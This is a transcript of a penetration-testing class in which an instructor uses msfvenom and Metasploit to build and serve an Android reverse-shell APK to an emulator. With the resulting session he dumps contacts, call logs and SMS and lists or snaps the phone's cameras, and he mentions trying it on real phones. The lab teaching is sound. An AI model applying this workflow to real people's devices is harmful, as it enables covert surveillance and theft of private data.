Yes, please go ahead. Bassam or Naif? Who was talking? Hello?
It was me. I
Okay.
was saying we did download it and take about 16 hours. So it's funny that we are not gonna use it, but
This
you know,
Sentoku?
yeah, because like
Yeah, that was
we were
crazy.
gonna do this lab yesterday,
Oh,
and
okay.
it takes a long time and we start downloading. I'm not really sure if most of us did it or not,
I
but
don't know.
some did.
I mean, why they are using this platform. I mean, I haven't used it. I have used Parrot, and I'm mostly using Kali Linux. So I'm assuming this platform is also same like a pen testing kind of platform. Similar to Kali Linux. So if you see here, use Syntax to scan your with the Nmap. So why do I need to have this when I have Nmap in the Kali Linux? It's just,
Oh yeah.
I don't know. I mean, if you want, I will look into this. That what if this platform has something different that we need to do. Although I don't think so. That
Uh,
yeah.
no, I'm okay with it. It just was like funny spending 15 hours downloading something, but
Why
yeah.
15 hours? It's only 2.5 GB. It should take like
The
yeah.
the platform or the website is really, really slow.
Ah, okay,
It's
okay,
not
okay.
really good. The website is all free. It's slow. You pay money, you get more. Blah blah blah.
Okay. Okay, no worries. So Jenny Motion, I will just let you guys know that there is one issue that I faced when I was trying to install it. So let me just go to Jenny Motion. So if the first thing you need to do is you have to create an account, because when you download the application, you will have to. So it's a free account. You don't need to give any credit card details or pay anything. So just
S- So we have to do this.
yeah, I mean, you have to create an account. That's a must. But there's nothing
Okay.
like you have to pay something, or no such thing is there. Okay.
Okay. So we don't need the file, but we need the account.
Yeah.
Okay.
Okay. So if you go to the resources and download, so basically the latest version is 3.3.1. Now, if you guys have a virtual box, and if you have a latest version of virtual box, you will have a problem because Genymotion doesn't work with the latest version. Okay. This is one thing. So what I recommend is that you can, if you have like the latest version, what I mean is that if you have VirtualBox 7, I don't know what is the current version, but if you see here, it is working with 6.1 VirtualBox, right? So there are two options. One is that the VirtualBox that you have already, you just remove the VirtualBox if you have the latest version. And then you can download this with the VirtualBox. So it basically downloads Genymotion along with the VirtualBox compatible version. If you already have VirtualBox, but it's not the latest one, then you can just download the Lite installer in which the VirtualBox is not included. So you have a VirtualBox already. You will just download the application. It's a simple exe application that you will just double click and start installing. So this is one thing that you have to keep in mind, that the VirtualBox, not every version of VirtualBox is compatible. The latest versions, I just double checked when I was trying to install and it didn't work. Okay. So once you have Genymotion, it looks something like this. When you open it, it will ask you to log in, and then you will see here lots of Android devices are there. Google, HTC, Motorola, Samsung Galaxy. Apart from that, if you want to create your custom application, you can go to Android API, you can select one of them, and then, you can create your custom phone as well. It's up to you. Okay. So what I've done here is that I actually, so once you select a phone, you basically have to click on these three dots on the right side and then start the installation. Okay. So I have installed two Samsung Galaxy S5 and then HTC One. One of them is switched off, so I just need one Android phone or application. So Genymotion, you can call it as an emulator. Okay, so since it is interfaced with the VirtualBox, so as you can see, when I run this phone, when I started this phone, Samsung Galaxy S5, it also shows here in the VirtualBox that it's running. Now, also just keep one thing in mind that when you are trying to install the phone, it asks you like the settings for the network. It has to be in the bridge mode. Okay, so just keep that in mind. If I click here, for instance, and I go here, you can see that the network setting is no, not here. I think when I boot, it asks me separately when I'm installing the phone that what settings do I want to have. So it should be on the bridge mode. Okay. All right. So now let me just show you the phone itself. How does it look like? Yeah. So this is the Samsung Galaxy S5 that I have. So since it's an emulator, it will show, maybe you will find a little bit of difference, but it's actually it's pretty good. You can see all the apps, the widgets, the messengers, the calling. For example, I was just trying to save some context, because when I exploit it, I will try to get the contact details, for example. So I created some of the contacts here. Let me see. So if you go here, I put Donald Trump there and Mr. Shadi also in my contact list. I also did some, I think, text messages. So on the right hand side also, you can see if I want to go back, I will just click like this. In the messaging, I have created some messages, uh, you know, just for the sake of demonstration purposes. Um, Apart from that, you can see if you want to access the settings of this phone, you can go to the settings, make sure that your Wi-Fi is switched on. Okay, and this is also where you will actually find out what is the IP address of this Android phone. So if I click on the wired SSID, you can see that the IP address is 192.168.1.156 because it is getting the IP address from the VirtualBox. Okay, so these are the settings, and then okay, so let me now move on to the. So now this is your application that we are trying to do penetration testing on. Where is my virtual machine? Okay. So now the first thing I'm going to do is I will just check that I am able to ping 192.168.1.156, which is the Android application. If I want to run nmap scan on it, I haven't tried, but let's see. All right, so basically the process is same, like we exploit any other virtual machine. However, the payload and the exploit that you might use might be different. So the next thing I want to do is, so basically what I'm trying to do now is that I want to exploit this Samsung Galaxy. So just let me go to home. So what I'm going to do here is that I will just create a payload. Okay. So you have done this before. So MSF Venom I'm using with -p, but this time you can see that I'm using a different payload with and the payload is Android/metal_predator/reverse_TCP. The local host is the IP address of the Kali Linux, which is 192.168. I just want to double check if it is still the same. Okay. So lhost is 192.168.1.157. The local port is Tetra 4. And then I'm going to write it. And the file name is, I'm just going to call it jenny.apk. Okay. So I'm going to create this file jenny.apk. Now, because in the Android phones .apk applications, you can install them. And the reason I'm using MetalPredator payload, because there are other payloads as well, but the reason I use mostly the MetalPredator is because this is the best payload that you can have. Will give you the best kind of access. By the way, you can try it on your, if you have an Android phone, you can try it on your original Android phone as well. Because I tested it on my Samsung, not now, but maybe sometime back. I'm using iPhone now. But I have tested it. You can access the camera, you can access a lot of things. Okay. So now you can see that I have the jenny.apk application here. What I have to do is that I have to start MSF console, the Metasploit. And how many of you are using Android phones? Yes, so Shahad is also right. If you have any problem with running the latest version of Genymotion, you can try with the older version. And where to look for, just Google it, older version of Genymotion, and you will find out. All right. But if the latest version works fine for you, it's better. Okay. So I'm going to use exploit multi-handler. I'm going to set the L host 192.168.1.157. Going to set the payload ANDROID Android slash MetalPredator. Android slash MetalPredator reverse underscore TCP. I think that's it. Okay. And then the second thing that I have to do is I have to start the Apache server. Apache start. Okay. And once my Apache is running, I will just check the status. Okay. All right. So my Apache is running. What I'm going to do is I'm going to copy the file that I just created in the home directory, and it was called jenny.apk. I'm using CP for copy. And I'm going to copy it in var/www/html folder. Okay. So I'm moving, I'm copying the file jenny.apk and I'm copying it to /var/w/html. And the reason I did that is because I want to download this file into as an application into the Android phone. So I will open the browser here, and it just an amazing application, by the way, and the version that we are using is free, by the way. So when you install it, it asks you you have a license or you want to use it for personal use. So make sure to choose the personal use option. Okay, so 192.168.1.157 slash Jenny.apk. So this is the file that I want to download. Okay, as you can see, it says it has started downloading and has been downloaded. So if I go to the downloads folder, Jenny.apk is there. Before I execute this application, I had to start the reverse handler exploit. So I'm going to run this exploit on the other side. Okay. And double click install. Just a minute. I actually installed it many times, an existing package of the same name. All right, so the reason I have installed these applications many times, and as you can see, one of them actually made a reverse connection with the reverse handler. So now since I have the MetaPredator session, I can use help to see what I can do with it. So for example, if I want to see the app list, what apps are running on the Android phone, I can use app_list. And you can see here all the applications which are running right now. Okay. Let me see what I can do. So for example, if I want to dump the contacts from the Android phone, I can use it. I can do it by using dump_contacts. So dump_contacts. So the file name is 54. So actually by default, it goes to the root. So I think this is the contacts_dump. Why it didn't copy the latest one, but let me see. I can show you the one that I did before. This was basically the SMS dump that I did before. Let me just remove these files. But first, let me show you. So this was when I added the first contact, and Shadi's name is also there, as you can see, but I want to get the latest list. So RM, I'm going to remove them. Okay. All right. Dump_call log. So call log has been dumped. Let me see if I have it in the root. No. cd/root. Maybe it's going to the downloads. No. I need to find out where is it saving these files. Should be saving somewhere. I don't know why it says that it has fetched two entries and three contacts. Uh, Maybe I can try to locate it. I don't know if I will find, but let me see. Copy, locate. It is downloading. But I don't know where is it keeping these files. Mm, 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 mm. Yeah, I'll try to find it out. I don't know why it's not showing me. Another thing that you can do, I mean, if you have access to the actual phone, like I said, you
Sir
can access.
Irshad,
Yes.
I think it's in home directory.
Let me check home. Oh, great. So I don't know. Last time it was copying it in the root folder, and this time it copied in the home. Okay, so we can see the call log, for example, which I just made two calls randomly on these two numbers. And you can see the contact list as well. So you have the three contacts that I showed you. You can also access the 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 camera of the phone by using a MetaPredator session, and I have tested it on a real phone on my own Samsung Galaxy, of course. Not Galaxy, I think it was Note. Okay, so where is the MetaPredator session now? All right, so if you see here, whatever commands are here, you can actually test them. Like for example, webcam underscore list is actually going to webcam underscore list is going to show you how many cameras does this phone have. So you can see, for example, it says it has a back camera and a front camera. Now, obviously, this is just an emulator. It doesn't really have a real camera attached to it. So we cannot really gain access to that camera. But uh, if you try it on your on Android phone, you can actually gain access by using stream. Okay, when you write webcam underscore stream, it will start streaming. But right now, let's see what it is doing. Don't think it should have access to camera because there is no camera attached to the phone. But you will see that you will have if you try it on the phone. You can take the snap by front or back, but you need to mention, I think if you need to mention you want to get snap from the front camera or the back camera. So if I write, I think webcam underscore snap one, it will take the snapshot from the back camera. If I write webcam underscore snap two, it will take the snapshot from the back camera. All right. So I think that's it. Is there anything else that we can use or do? So if you want to install some other application onto the phone, you can use these commands app underscore install to install a new application. And rest of the command, there are too many commands, so you can try some of them and see. But it's not necessary that all of these commands will work for you. Okay. Obviously, because it's an Android phone, so you have to use mostly the commands which are for the Android. Okay, guys, any question? Okay, if no questions, then you can start working on the lab. In the meantime, I will try to
Thank you,
get
Dr. Yes.
I will try to get the video from the yesterday session. If they have it, then I will just share it with you guys. Okay.
للأسف
Yes.
Sorry, but can you do the another lab
Which
for
lab?
yesterday? I can't understand with Mr. Somi, actually. Sorry.
Okay, I will do it, but not today. Okay, so I will just go through it, what exactly they have done or they want to do, because on the platform, it's a little bit confusing exactly what type of attack they want to launch. So let me check with them, or at least go
Okay.
through myself what exactly I need to cover, because this juice shop has so many vulnerabilities. So I don't know which one they are covering. I know it's an SQL injection and local file inclusion, but I just want to see which application within juice shop they are trying to exploit and how they are, doing it. So let me first check with them, and if it's not really clear to you guys, I'm going to repeat it. No problem for me. Okay,
Okay, thank you.
thank you.
Mr. Asad,
Yeah.
at the first step, when download